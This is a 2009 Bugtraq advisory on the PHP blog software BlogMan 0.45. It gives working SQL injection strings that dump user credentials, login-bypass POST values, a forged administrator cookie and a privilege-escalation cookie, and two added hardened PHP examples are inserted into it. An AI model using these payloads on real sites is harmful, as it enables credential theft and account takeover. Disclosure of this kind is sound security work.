BlogMan 0.45 Multiple Vulnerabilities
- To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <str0ke@xxxxxxxxxxx>
- Subject: BlogMan 0.45 Multiple Vulnerabilities
- From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
- Date: Sun, 1 Mar 2009 16:47:38 +0100
******* Salvatore "drosophila" Fresta *******
Application: BlogMan
http://sourceforge.net/projects/blogman/
Version: 0.45
Bug: * Multiple SQL Injection
* Authentication Bypass
* Privilege Escalation
Exploitation: Remote
Date: 1 Mar 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophilaxxx@xxxxxxxxx
*************************************************
- BUGS
This blog software is vulnerable to SQL injection throughout.
The following are vulnerable queries that can be abused
to obtain restricted information.
#[1] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: index.php, register.php, viewall.php
The following lines do not validate their input:
/*
if (isset($_COOKIE['blogmanuserid'])) {
    // The cookie value is used verbatim: no escaping, no integer cast.
    $id = $_COOKIE['blogmanuserid'];
    $query = "SELECT * FROM user WHERE UserID='".$id."'";
    $user = mysql_fetch_array(mysql_query($query)) or die(mysql_error());
    // The returned row and the raw cookie value are echoed into the page.
    echo "<p class='loginusername'><a href='edit.php?id=".$id."'>".$user['UserName']."</a></p>\n";
*/
Using a cookie editor it is possible to edit that cookie
and manipulate the query, as follows:
Name: blogmanuserid
Content: -1' UNION ALL SELECT 1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16 FROM user#
Server: target_server (example: localhost)
Path: /blogman/
#[2] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: read.php
This bug allows a guest to view the username
and password of a registered user.
http://site/path/read.php?id=-1'UNION ALL SELECT NULL,2,CONCAT(UserName,char(58),UserPassword),NULL,5,6,7 FROM user%23
#[3] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: profile.php
This bug allows a guest to view the username
and password of a registered user.
http://site/path/profile.php?id=-1' UNION ALL SELECT 1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16 FROM user%23
#[1] Authentication Bypass:
Requisites: magic_quotes_gpc = off
File affected: doLogin.php
The following lines do not validate their input:
/*
$un = $_POST['un'];
$pw = $_POST['pw'];
...
// Both POST values are concatenated into SQL without escaping.
$pwHashed = mysql_fetch_array(mysql_query("SELECT PASSWORD('".$pw."')"));
$userRow = mysql_fetch_array(mysql_query("SELECT * FROM user WHERE UserName='".$un."'"));
// An injected UNION can supply every column compared here, so the
// check passes against attacker-chosen values.
if ($userRow['UserPassword'] == $pwHashed[0] &&
    $userRow['UserActive'] && !$userRow['UserDisabled']) {
    $expires = time() + 3*24*60*60;
    // The bare user id in this cookie becomes the only proof of identity.
    setcookie("blogmanuserid", $userRow['UserID'], $expires);
}
*/
Using the SQL injection in this query it is possible to satisfy
the conditions and have an arbitrary UserID value set in the cookie.
The following parameters must be sent by POST to doLogin.php:
un = ' UNION ALL SELECT 1,NULL,PASSWORD('mypass'),NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,NULL,NULL,NULL,NULL#
pw = mypass
The first value is UserID, the third value is the password,
the tenth value is UserDisabled and the eleventh value is
UserActive.
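A hardened replacement for the doLogin.php logic quoted above, written here as an added example (it is not BlogMan's code). It assumes a PDO connection in $db and that user.UserPassword has been migrated to store password_hash() output instead of MySQL PASSWORD(); the identity is kept in a server-side session rather than a client-editable cookie.

```php
<?php
// Added example: hardened login for BlogMan-style schema (assumed columns
// UserID, UserName, UserPassword, UserActive, UserDisabled in table "user").
declare(strict_types=1);
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

function login(PDO $db, string $un, string $pw): ?int
{
    // Placeholders keep user input out of the SQL text, so a quote in $un
    // cannot turn the lookup into a UNION that supplies its own password row.
    $stmt = $db->prepare(
        'SELECT UserID, UserPassword, UserActive, UserDisabled
           FROM user WHERE UserName = :un'
    );
    $stmt->execute([':un' => $un]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Verify against a hash even when no row was found, so response timing
    // does not reveal whether the username exists.
    $hash = $row['UserPassword'] ?? password_hash('', PASSWORD_DEFAULT);
    $ok = password_verify($pw, $hash);

    if ($row === false || !$ok || !$row['UserActive'] || $row['UserDisabled']) {
        return null;
    }
    // Identity lives in the server-side session, never in a plain cookie;
    // regenerating the id defeats session fixation.
    session_regenerate_id(true);
    $_SESSION['uid'] = (int) $row['UserID'];
    return (int) $row['UserID'];
}

// Connection details are placeholders (assumption).
$db = new PDO('mysql:host=localhost;dbname=blogman', 'blogman', 'secret', [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);
$uid = login($db, (string) ($_POST['un'] ?? ''), (string) ($_POST['pw'] ?? ''));
if ($uid === null) {
    http_response_code(401);
    exit('Login failed');
}
header('Location: index.php');
```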
#[2] Authentication Bypass:
Requisites: none
File affected: all
It is possible to bypass the authentication
system by creating a cookie named 'blogmanuserid'
and setting its content to the ID of a registered
user (often 1 for the administrator):
Name: blogmanuserid
Content: 1
Server: target_server (example: localhost)
Path: /blogman/
Privilege Escalation:
Requisites: magic_quotes_gpc = off
File affected: admin.php
It is possible to escalate privileges using
a SQL injection bug through the same cookie.
The following lines do not validate their input:
/*
// Same pattern as index.php: the cookie value goes straight into the query.
$id = $_COOKIE['blogmanuserid'];
$user = mysql_fetch_array(mysql_query("SELECT * FROM user WHERE UserID='".$id."'"));
if (!$user['UserCanAdmin']) {
    // Non-admins are only redirected client-side.
    echo "<meta http-equiv='refresh' content='0;index.php'></head></html>";
} else {
    ...
}
*/
Name: blogmanuserid
Content: -1' UNION ALL SELECT 2,NULL,3,4,5,6,7,8,9,10,11,12,13,14,15,1#
Server: target_server (example: localhost)
Path: /blogman/
The first value is UserID and the last value
is UserCanAdmin.
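Both the cookie-forging bypass above and this privilege escalation come from trusting $_COOKIE['blogmanuserid'] as the user's identity. The following added example (not BlogMan's code) shows a hardened check for index.php and admin.php; it assumes a PDO connection in $db, a login step that stores the user id in $_SESSION['uid'], and the column names shown in the advisory.

```php
<?php
// Added example: identity from the server-side session, lookup by bound
// integer, and a server-side admin gate (assumed table "user").
declare(strict_types=1);
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

// Returns the logged-in user's row, or null if nobody is logged in.
function currentUser(PDO $db): ?array
{
    // Identity comes from the session, not $_COOKIE, so a visitor cannot
    // simply write "blogmanuserid=1" and become user 1.
    if (!isset($_SESSION['uid']) || !is_int($_SESSION['uid'])) {
        return null;
    }
    // Bound as an integer: no string can reach the SQL text, so a UNION
    // that sets UserCanAdmin=1 is impossible here.
    $stmt = $db->prepare(
        'SELECT UserID, UserName, UserCanAdmin FROM user WHERE UserID = :id'
    );
    $stmt->bindValue(':id', $_SESSION['uid'], PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Ends the request unless the current user is an administrator; the
// decision is enforced server-side with a 403, not a client-side redirect.
function requireAdmin(PDO $db): array
{
    $user = currentUser($db);
    if ($user === null || !$user['UserCanAdmin']) {
        http_response_code(403);
        exit('Forbidden');
    }
    return $user;
}

// Connection details are placeholders (assumption).
$db = new PDO('mysql:host=localhost;dbname=blogman', 'blogman', 'secret', [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);
$admin = requireAdmin($db);
// Escape the name on output; the original echoed database fields raw.
echo '<p>Admin: ' . htmlspecialchars($admin['UserName'], ENT_QUOTES) . "</p>\n";
```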
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351